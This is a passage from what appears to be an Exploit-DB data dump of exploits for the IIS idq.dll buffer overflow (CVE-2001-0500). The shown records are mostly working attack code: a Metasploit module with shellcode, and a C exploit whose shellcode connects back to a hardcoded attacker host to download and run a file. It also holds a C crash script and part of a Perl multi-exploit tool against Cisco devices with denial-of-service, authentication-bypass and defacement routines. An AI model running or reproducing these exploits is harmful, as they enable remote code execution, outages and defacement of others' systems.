Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft IIS 5.0 IDQ Path Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the IDQ ISAPI handler for\r\n\t\t\t\tMicrosoft Index Server.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2001-0500'],\r\n\t\t\t\t\t[ 'OSVDB', '568'],\r\n\t\t\t\t\t[ 'MSB', 'MS01-033'],\r\n\t\t\t\t\t[ 'BID', '2880'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 800,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro English SP0', { 'Ret' => '0x6e8f3e24' } ],\r\n\t\t\t\t\t[ 'Windows 2000 Pro English SP1-SP2', { 'Ret' => '0x6e8f8cc4' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jun 18 2001',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([Opt::RPORT(80)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = rand_text_alphanumeric(1) + \".idq?\" + rand_text_alphanumeric(232)\r\n\t\tsploit << \"%u06eb.%u\" + target.ret[-4, 4] + \"%u\" + target.ret[-8, 4]\r\n\t\tsploit << \".%uC033%uB866%u031F%u0340%u8BD8%u8B03%u6840%uDB33%u30B3%uC303%uE0FF=\"\r\n\t\tsploit << rand_text_alphanumeric(1) + \" HTTP/1.0\\r\\n\\r\\n\" + 
rand_text_alphanumeric(46)\r\n\r\n\t\turi = '/' + sploit + payload.encoded\r\n\r\n\t\tres = \"GET #{uri}\\r\\n\\r\\n\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsock.put(res)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16472/"}, {"lastseen": "2016-02-02T15:18:32", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (2). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-21T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-21T00:00:00", "id": "EDB-ID:20931", "href": "https://www.exploit-db.com/exploits/20931/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. 
In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n/*\r\n IIS5.0 .idq overrun remote exploit\r\n Programmed by hsj : 01.06.21\r\n\r\n code flow:\r\n overrun -> jmp or call ebx -> jmp 8 ->\r\n check shellcode addr and jump to there ->\r\n shellcode -> make back channel -> download & exec code\r\n*/\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <signal.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/time.h>\r\n#include <sys/wait.h>\r\n#include <errno.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <netinet/in.h>\r\n#include <limits.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n\r\n#define RET 0x77e516de /* jmp or call ebx */\r\n#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */\r\n#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */\r\n#define GMHANDLEA_OFFSET 24\r\n#define GPADDRESS_OFFSET 61\r\n#define OFFSET 234 /* exception handler offset */\r\n#define NOP 0x41\r\n\r\n#define MASKING 1\r\n#if MASKING\r\n#define PORTMASK 0x4141\r\n#define ADDRMASK 0x41414141\r\n#define PORTMASK_OFFSET 128\r\n#define ADDRMASK_OFFSET 133\r\n#endif\r\n\r\n#define PORT 80\r\n#define ADDR \"attacker.mydomain.co.jp\"\r\n#define PORT_OFFSET 115\r\n#define ADDR_OFFSET 120\r\nunsigned char 
shellcode[]=\r\n\"\\x5B\\x33\\xC0\\x40\\x40\\xC1\\xE0\\x09\\x2B\\xE0\\x33\\xC9\\x41\\x41\\x33\\xC0\"\r\n\"\\x51\\x53\\x83\\xC3\\x06\\x88\\x03\\xB8\\xDD\\xCC\\xBB\\xAA\\xFF\\xD0\\x59\\x50\"\r\n\"\\x43\\xE2\\xEB\\x33\\xED\\x8B\\xF3\\x5F\\x33\\xC0\\x80\\x3B\\x2E\\x75\\x1E\\x88\"\r\n\"\\x03\\x83\\xFD\\x04\\x75\\x04\\x8B\\x7C\\x24\\x10\\x56\\x57\\xB8\\xDD\\xCC\\xBB\"\r\n\"\\xAA\\xFF\\xD0\\x50\\x8D\\x73\\x01\\x45\\x83\\xFD\\x08\\x74\\x03\\x43\\xEB\\xD8\"\r\n\"\\x8D\\x74\\x24\\x20\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\x8B\\x46\\xFC\\xFF\\xD0\"\r\n\"\\x8B\\xF8\\x33\\xC0\\x40\\x40\\x66\\x89\\x06\\xC1\\xE0\\x03\\x50\\x56\\x57\\x66\"\r\n\"\\xC7\\x46\\x02\\xBB\\xAA\\xC7\\x46\\x04\\x44\\x33\\x22\\x11\"\r\n#if MASKING\r\n\"\\x66\\x81\\x76\\x02\\x41\\x41\\x81\\x76\\x04\\x41\\x41\\x41\\x41\"\r\n#endif\r\n\"\\x8B\\x46\\xF8\\xFF\\xD0\\x33\\xC0\"\r\n\"\\xC7\\x06\\x5C\\x61\\x61\\x2E\\xC7\\x46\\x04\\x65\\x78\\x65\\x41\\x88\\x46\\x07\"\r\n\"\\x66\\xB8\\x80\\x01\\x50\\x66\\xB8\\x01\\x81\\x50\\x56\\x8B\\x46\\xEC\\xFF\\xD0\"\r\n\"\\x8B\\xD8\\x33\\xC0\\x50\\x40\\xC1\\xE0\\x09\\x50\\x8D\\x4E\\x08\\x51\\x57\\x8B\"\r\n\"\\x46\\xF4\\xFF\\xD0\\x85\\xC0\\x7E\\x0E\\x50\\x8D\\x4E\\x08\\x51\\x53\\x8B\\x46\"\r\n\"\\xE8\\xFF\\xD0\\x90\\xEB\\xDC\\x53\\x8B\\x46\\xE4\\xFF\\xD0\\x57\\x8B\\x46\\xF0\"\r\n\"\\xFF\\xD0\\x33\\xC0\\x50\\x56\\x56\\x8B\\x46\\xE0\\xFF\\xD0\\x33\\xC0\\xFF\\xD0\";\r\n\r\nunsigned char storage[]=\r\n\"\\xEB\\x02\"\r\n\"\\xEB\\x4E\"\r\n\"\\xE8\\xF9\\xFF\\xFF\\xFF\"\r\n\"msvcrt.ws2_32.socket.connect.recv.closesocket.\"\r\n\"_open._write._close._execl.\";\r\n\r\nunsigned char forwardjump[]=\r\n\"%u08eb\";\r\n\r\nunsigned char jump_to_shell[]=\r\n\"%uC033%uB866%u031F%u0340%u8BD8%u8B03\"\r\n\"%u6840%uDB33%u30B3%uC303%uE0FF\";\r\n\r\nunsigned int resolve(char *name)\r\n{\r\n struct hostent *he;\r\n unsigned int ip;\r\n\r\n if((ip=inet_addr(name))==(-1))\r\n {\r\n if((he=gethostbyname(name))==0)\r\n return 0;\r\n memcpy(&ip,he->h_addr,4);\r\n }\r\n return ip;\r\n}\r\n\r\nint 
make_connection(char *address,int port)\r\n{\r\n struct sockaddr_in server,target;\r\n int s,i,bf;\r\n fd_set wd;\r\n struct timeval tv;\r\n\r\n s = socket(AF_INET,SOCK_STREAM,0);\r\n if(s<0)\r\n return -1;\r\n memset((char *)&server,0,sizeof(server));\r\n server.sin_family = AF_INET;\r\n server.sin_addr.s_addr = htonl(INADDR_ANY);\r\n server.sin_port = 0;\r\n\r\n target.sin_family = AF_INET;\r\n target.sin_addr.s_addr = resolve(address);\r\n if(target.sin_addr.s_addr==0)\r\n {\r\n close(s);\r\n return -2;\r\n }\r\n target.sin_port = htons(port);\r\n bf = 1;\r\n ioctl(s,FIONBIO,&bf);\r\n tv.tv_sec = 10;\r\n tv.tv_usec = 0;\r\n FD_ZERO(&wd);\r\n FD_SET(s,&wd);\r\n connect(s,(struct sockaddr *)&target,sizeof(target));\r\n if((i=select(s+1,0,&wd,0,&tv))==(-1))\r\n {\r\n close(s);\r\n return -3;\r\n }\r\n if(i==0)\r\n {\r\n close(s);\r\n return -4;\r\n }\r\n i = sizeof(int);\r\n getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);\r\n if((bf!=0)||(i!=sizeof(int)))\r\n {\r\n close(s);\r\n errno = bf;\r\n return -5;\r\n }\r\n ioctl(s,FIONBIO,&bf);\r\n return s;\r\n}\r\n\r\nint get_connection(int port)\r\n{\r\n struct sockaddr_in local,remote;\r\n int lsock,csock,len,reuse_addr;\r\n\r\n lsock = socket(AF_INET,SOCK_STREAM,0);\r\n if(lsock<0)\r\n {\r\n perror(\"socket\");\r\n exit(1);\r\n }\r\n reuse_addr = 1;\r\n if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reus\r\ne_addr))<0)\r\n {\r\n perror(\"setsockopt\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n memset((char *)&local,0,sizeof(local));\r\n local.sin_family = AF_INET;\r\n local.sin_port = htons(port);\r\n local.sin_addr.s_addr = htonl(INADDR_ANY);\r\n if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)\r\n {\r\n perror(\"bind\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n if(listen(lsock,1)<0)\r\n {\r\n perror(\"listen\");\r\n close(lsock);\r\n exit(1);\r\n }\r\nretry:\r\n len = sizeof(remote);\r\n csock = accept(lsock,(struct sockaddr *)&remote,&len);\r\n if(csock<0)\r\n {\r\n if(errno!=EINTR)\r\n 
{\r\n perror(\"accept\");\r\n close(lsock);\r\n exit(1);\r\n }\r\n else\r\n goto retry;\r\n }\r\n close(lsock);\r\n return csock;\r\n}\r\n\r\nint main(int argc,char *argv[])\r\n{\r\n int i,j,s,pid;\r\n unsigned int cb;\r\n unsigned short port;\r\n char *p,buf[512],buf2[512],buf3[2048];\r\n FILE *fp;\r\n\r\n if(argc!=3)\r\n {\r\n printf(\"usage: $ %s ip file\\n\",argv[0]);\r\n return -1;\r\n }\r\n if((fp=fopen(argv[2],\"rb\"))==0)\r\n return -2;\r\n\r\n if(!(cb=resolve(ADDR)))\r\n return -3;\r\n\r\n if((pid=fork())<0)\r\n return -4;\r\n\r\n if(pid)\r\n {\r\n fclose(fp);\r\n s = make_connection(argv[1],80);\r\n if(s<0)\r\n {\r\n printf(\"connect error:[%d].\\n\",s);\r\n kill(pid,SIGTERM);\r\n return -5;\r\n }\r\n\r\n j = strlen(shellcode);\r\n *(unsigned int *)&shellcode[GMHANDLEA_OFFSET] = GMHANDLEA;\r\n *(unsigned int *)&shellcode[GPADDRESS_OFFSET] = GPADDRESS;\r\n port = htons(PORT);\r\n#if MASKING\r\n port ^= PORTMASK;\r\n cb ^= ADDRMASK;\r\n *(unsigned short *)&shellcode[PORTMASK_OFFSET] = PORTMASK;\r\n *(unsigned int *)&shellcode[ADDRMASK_OFFSET] = ADDRMASK;\r\n#endif\r\n *(unsigned short *)&shellcode[PORT_OFFSET] = port;\r\n *(unsigned int *)&shellcode[ADDR_OFFSET] = cb;\r\n for(i=0;i<strlen(shellcode);i++)\r\n {\r\n if((shellcode[i]==0x0a)||\r\n (shellcode[i]==0x0d)||\r\n (shellcode[i]==0x3a))\r\n break;\r\n }\r\n if(i!=j)\r\n {\r\n printf(\"bad portno or ip address...\\n\");\r\n close(s);\r\n kill(pid,SIGTERM);\r\n return -6;\r\n }\r\n\r\n memset(buf,1,sizeof(buf));\r\n p = &buf[OFFSET-2];\r\n sprintf(p,\"%s\",forwardjump);\r\n p += strlen(forwardjump);\r\n *p++ = 1;\r\n *p++ = '%';\r\n *p++ = 'u';\r\n sprintf(p,\"%04x\",(RET>>0)&0xffff);\r\n p += 4;\r\n *p++ = '%';\r\n *p++ = 'u';\r\n sprintf(p,\"%04x\",(RET>>16)&0xffff);\r\n p += 4;\r\n *p++ = 1;\r\n sprintf(p,\"%s\",jump_to_shell);\r\n\r\n memset(buf2,NOP,sizeof(buf2));\r\n memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-strlen(storage)-1],storage,\r\nstrlen(storage));\r\n 
memcpy(&buf2[sizeof(buf2)-strlen(shellcode)-1],shellcode,strlen(shellco\r\nde));\r\n buf2[sizeof(buf2)-1] = 0;\r\n\r\n sprintf(buf3,\"GET /a.idq?%s=a HTTP/1.0\\r\\nShell: %s\\r\\n\\r\\n\",buf,buf2);\r\n write(s,buf3,strlen(buf3));\r\n\r\n printf(\"---\");\r\n for(i=0;i<strlen(buf3);i++)\r\n {\r\n if((i%16)==0)\r\n printf(\"\\n\");\r\n printf(\"%02X \",buf3[i]&0xff);\r\n }\r\n printf(\"\\n---\\n\");\r\n\r\n wait(0);\r\n sleep(1);\r\n shutdown(s,2);\r\n close(s);\r\n\r\n printf(\"Done.\\n\");\r\n }\r\n else\r\n {\r\n s = get_connection(PORT);\r\n j = 0;\r\n while((i=fread(buf,1,sizeof(buf),fp)))\r\n {\r\n write(s,buf,i);\r\n j += i;\r\n printf(\".\");\r\n fflush(stdout);\r\n }\r\n fclose(fp);\r\n printf(\"\\n%d bytes send...\\n\",j);\r\n\r\n shutdown(s,2);\r\n close(s);\r\n }\r\n\r\n return 0;\r\n}\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20931/"}, {"lastseen": "2016-02-02T15:18:24", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (1). CVE-2001-0500. Dos exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20930", "href": "https://www.exploit-db.com/exploits/20930/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n\r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. 
A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n\r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n\r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n// DoS for isapi idq.dll unchecked buffer.\r\n// For Testing Pruposes\r\n// By Ps0 DtMF dot com dot ar\r\n\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n\r\n// #define DEBUG\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n char mensaje[800];\r\n char *bof;\r\n int fd;\r\n struct sockaddr_in sin;\r\n struct hostent *rhost;\r\n\r\n if(argc<2) {\r\n fprintf(stderr,\"Use : %s host\\n\",argv[0]);\r\n exit(0);\r\n }\r\n \r\n bzero(mensaje,strlen(mensaje));\r\n \r\n bof=(char *)malloc(240); // 240 segun eeye , si se le da mas NO anda\r\n \r\n memset(bof,'A',240);\r\n \r\n sprintf(mensaje,\"GET /NULL.ida?%s=X HTTP/1.0\\n\\n\",bof);\r\n \r\n \r\n#ifdef DEBUG\r\n printf(\"\\nMenssage : \\n%s\\n\",mensaje);\r\n#endif\r\n \r\n if ((rhost=gethostbyname(argv[1]))==NULL){\r\n printf(\"\\nCan't find remote host %s \\t E:%d\\n\",argv[1],h_errno);\r\n return -1;\r\n }\r\n\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(80);\r\n\r\n memcpy(&sin.sin_addr.s_addr, rhost->h_addr, rhost->h_length);\r\n\r\n fd = socket(AF_INET,SOCK_STREAM,6);\r\n\r\n if (connect(fd,(struct sockaddr *)&sin, sizeof(struct sockaddr))!=0){\r\n printf(\"\\nCan't Connect to The host %s. May be down ? 
E:%s\\n\",argv[1],strerror(errno));\r\n return -1;\r\n }\r\n \r\n printf(\"Sending string........\\n\");\r\n \r\n if(send(fd,mensaje,strlen(mensaje),0)==-1){\r\n printf(\"\\nError \\n\");\r\n return -1;\r\n }\r\n \r\n printf(\"\\nString Sent... try telnet host 80 to check if IIS is down\\n\");\r\n \r\n close(fd);\r\n \r\n return 0;\r\n \r\n}\r\n \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20930/"}, {"lastseen": "2016-02-02T15:18:47", "description": "MS Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow (4). CVE-2001-0500. Remote exploit for windows platform", "published": "2001-06-18T00:00:00", "type": "exploitdb", "title": "Microsoft Index Server 2.0 and Indexing Service for Win 2000 ISAPI Extension Buffer Overflow 4", "bulletinFamily": "exploit", "cvelist": ["CVE-2001-0500"], "modified": "2001-06-18T00:00:00", "id": "EDB-ID:20933", "href": "https://www.exploit-db.com/exploits/20933/", "sourceData": "source: http://www.securityfocus.com/bid/2880/info\r\n \r\nWindows Index Server ships with Windows NT 4.0 Option Pack; Windows Indexing Service ships with Windows 2000. An unchecked buffer resides in the 'idq.dll' ISAPI extension associated with each service. A maliciously crafted request could allow arbitrary code to run on the host in the Local System context.\r\n \r\nNote that Index Server and Indexing Service do not need to be running for an attacker to exploit this issue. Since 'idq.dll' is installed by default when IIS is installed, IIS would need to be the only service running.\r\n \r\nNote also that this vulnerability is currently being exploited by the 'Code Red' worm. 
In addition, all products that run affected versions of IIS are also vulnerable.\r\n\r\n#!/usr/bin/perl\r\n\r\n##\r\n# Cisco Global Exploiter\r\n#\r\n# Legal notes :\r\n# The BlackAngels staff refuse all responsabilities\r\n# for an incorrect or illegal use of this software\r\n# or for eventual damages to others systems.\r\n#\r\n# http://www.blackangels.it\r\n##\r\n\r\n\r\n\r\n##\r\n# Modules\r\n##\r\n\r\nuse Socket;\r\nuse IO::Socket;\r\n\r\n\r\n##\r\n# Main\r\n##\r\n\r\n$host = \"\";\r\n$expvuln = \"\";\r\n$host = @ARGV[ 0 ];\r\n$expvuln = @ARGV[ 1 ];\r\n\r\nif ($host eq \"\") {\r\nusage();\r\n}\r\nif ($expvuln eq \"\") {\r\nusage();\r\n}\r\nif ($expvuln eq \"1\") {\r\ncisco1();\r\n}\r\nelsif ($expvuln eq \"2\") {\r\ncisco2();\r\n}\r\nelsif ($expvuln eq \"3\") {\r\ncisco3();\r\n}\r\nelsif ($expvuln eq \"4\") {\r\ncisco4();\r\n}\r\nelsif ($expvuln eq \"5\") {\r\ncisco5();\r\n}\r\nelsif ($expvuln eq \"6\") {\r\ncisco6();\r\n}\r\nelsif ($expvuln eq \"7\") {\r\ncisco7();\r\n}\r\nelsif ($expvuln eq \"8\") {\r\ncisco8();\r\n}\r\nelsif ($expvuln eq \"9\") {\r\ncisco9();\r\n}\r\nelsif ($expvuln eq \"10\") {\r\ncisco10();\r\n}\r\nelsif ($expvuln eq \"11\") {\r\ncisco11();\r\n}\r\nelsif ($expvuln eq \"12\") {\r\ncisco12();\r\n}\r\nelsif ($expvuln eq \"13\") {\r\ncisco13();\r\n}\r\nelsif ($expvuln eq \"14\") {\r\ncisco14();\r\n}\r\nelse {\r\nprintf \"\\nInvalid vulnerability number ...\\n\\n\";\r\nexit(1);\r\n}\r\n\r\n\r\n##\r\n# Functions\r\n##\r\n\r\nsub usage\r\n{\r\n printf \"\\nUsage :\\n\";\r\n printf \"perl cge.pl <target> <vulnerability number>\\n\\n\";\r\n printf \"Vulnerabilities list :\\n\";\r\n printf \"[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\\n\";\r\n printf \"[2] - Cisco IOS Router Denial of Service Vulnerability\\n\";\r\n printf \"[3] - Cisco IOS HTTP Auth Vulnerability\\n\";\r\n printf \"[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\\n\";\r\n printf \"[5] - Cisco Catalyst SSH Protocol Mismatch Denial of 
Service Vulnerability\\n\";\r\n printf \"[6] - Cisco 675 Web Administration Denial of Service Vulnerability\\n\";\r\n printf \"[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\\n\";\r\n printf \"[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\\n\";\r\n printf \"[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\\n\";\r\n printf \"[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\\n\";\r\n printf \"[11] - Cisco Catalyst Memory Leak Vulnerability\\n\";\r\n printf \"[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\\n\";\r\n printf \"[13] - %u Encoding IDS Bypass Vulnerability (UTF)\\n\";\r\n printf \"[14] - Cisco IOS HTTP Denial of Service Vulnerability\\n\";\r\n exit(1);\r\n}\r\n\r\nsub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability\r\n{\r\n my $serv = $host;\r\n my $dch = \"?????????????????a~ %%%%%XX%%%%%\";\r\n my $num = 30000;\r\n my $string .= $dch x $num;\r\n my $shc=\"\\015\\012\";\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n ) || die(\"No telnet server detected on $serv ...\\n\\n\");\r\n\r\n $sockd->autoflush(1);\r\n print $sockd \"$string\". $shc;\r\n while (<$sockd>){ print }\r\n print(\"\\nPacket sent ...\\n\");\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto => \"tcp\",\r\n PeerAddr => $serv,\r\n PeerPort => \"(23)\",\r\n ) || die(\"Vulnerability successful exploited. Target server is down ...\\n\\n\");\r\n\r\n print(\"Vulnerability unsuccessful exploited. 
Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco2 # Cisco IOS Router Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n\r\n my $sockd = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd){die \"No http server detected on $serv ...\\n\\n\"};\r\n $sockd->autoflush(1);\r\n print $sockd \"GET /\\%\\% HTTP/1.0\\n\\n\";\r\n -close $sockd;\r\n print \"Packet sent ...\\n\";\r\n sleep(1);\r\n print(\"Now checking server's status ...\\n\");\r\n sleep(2);\r\n\r\n my $sockd2 = IO::Socket::INET->new (\r\n Proto=>\"tcp\",\r\n PeerAddr=>$serv,\r\n PeerPort=>\"http(80)\",);\r\n unless ($sockd2){die \"Vulnerability successful exploited. Target server is down ...\\n\\n\"};\r\n\r\n print(\"Vulnerability unsuccessful exploited. Target server is still up ...\\n\\n\");\r\n close($sockd2);\r\n exit(1);\r\n}\r\n\r\nsub cisco3 # Cisco IOS HTTP Auth Vulnerability\r\n{\r\n my $serv= $host;\r\n my $n=16;\r\n my $port=80;\r\n my $target = inet_aton($serv);\r\n my $fg = 0;\r\n\r\n LAB: while ($n<100) {\r\n my @results=exploit(\"GET /level/\".$n.\"/exec/- HTTP/1.0\\r\\n\\r\\n\");\r\n $n++;\r\n foreach $line (@results){\r\n $line=~ tr/A-Z/a-z/;\r\n if ($line =~ /http\\/1\\.0 401 unauthorized/) {$fg=1;}\r\n if ($line =~ /http\\/1\\.0 200 ok/) {$fg=0;}\r\n }\r\n\r\n if ($fg==1) {\r\n sleep(2);\r\n print \"Vulnerability unsuccessful exploited ...\\n\\n\";\r\n }\r\n else {\r\n sleep(2);\r\n print \"\\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] 
...\\n\\n\";\r\n last LAB;\r\n }\r\n\r\n sub exploit {\r\n my ($pstr)=@_;\r\n socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||\r\n die(\"Unable to initialize socket ...\\n\\n\");\r\n if(connect(S,pack \"SnA4x8\",2,$port,$target)){\r\n my @in;\r\n select(S);\r\n $|=1;\r\n print $pstr;\r\n while(<S>){ push @in, $_;}\r\n select(STDOUT); close(S); return @in;\r\n }\r\n else { die(\"No http server detected on $serv ...\\n\\n\"); }\r\n }\r\n }\r\n exit(1);\r\n}\r\n\r\nsub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\r\n{\r\n my $serv = $host;\r\n my $n = 16;\r\n\r\n while ($n <100) {\r\n exploit1(\"GET /level/$n/exec/- HTTP/1.0\\n\\n\");\r\n $wr =~ s/\\n//g;\r\n if ($wr =~ /200 ok/) {\r\n while(1)\r\n { print \"\\nVulnerability could be successful exploited. Please choose a type of attack :\\n\";\r\n print \"[1] Banner change\\n\";\r\n print \"[2] List vty 0 4 acl info\\n\";\r\n print \"[3] Other\\n\";\r\n print \"Enter a valid option [ 1 - 2 - 3 ] : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n\r\n if ($vuln == 1) {\r\n print \"\\nEnter deface line : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n exploit1(\"GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\\n\\n\");\r\n }\r\n elsif ($vuln == 2) {\r\n exploit1(\"GET /level/$n/exec/show%20conf HTTP/1.0\\n\\n\");\r\n print \"$wrf\";\r\n }\r\n elsif ($vuln == 3)\r\n { print \"\\nEnter attack URL : \";\r\n $vuln = <STDIN>;\r\n chomp($vuln);\r\n exploit1(\"GET /$vuln HTTP/1.0\\n\\n\");\r\n print \"$wrf\";\r\n }\r\n }\r\n }\r\n $wr = \"\";\r\n $n++;\r\n }\r\n die \"Vulnerability unsuccessful exploited ...\\n\\n\";\r\n\r\n sub exploit1 {\r\n my $sockd = IO::Socket::INET -> new (\r\n Proto => 'tcp',\r\n PeerAddr => $serv,\r\n PeerPort => 80,\r\n Type => SOCK_STREAM,\r\n Timeout => 5);\r\n unless($sockd){die \"No http server detected on $serv ...\\n\\n\"}\r\n $sockd->autoflush(1);\r\n $sockd -> send($_[0]);\r\n while(<$sockd>){$wr .= $_} $wrf = $wr;\r\n close $sockd;\r\n 
}\r\n exit(1);\r\n}\r\n\r\nsub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 22;\r\n my $vuln = \"a%a%a%a%a%a%a%\";\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No ssh server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $vuln = \"GET ? HTTP/1.0\\n\\n\";\r\n \r\n my $sockd = IO::Socket::INET->new (\r\n PeerAddr => $serv,\r\n PeerPort => $port,\r\n Proto => \"tcp\")\r\n || die \"No http server detected on $serv ...\\n\\n\";\r\n\r\n print \"Packet sent ...\\n\";\r\n print $sockd \"$vuln\";\r\n sleep(2);\r\n print \"\\nServer response :\\n\\n\";\r\n close($sockd);\r\n exit(1);\r\n}\r\n\r\nsub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\r\n{\r\n my $serv = $host;\r\n my $port = 80;\r\n my $k = \"\";\r\n \r\n print \"Enter a file to read [ /show/config/cr set as default ] 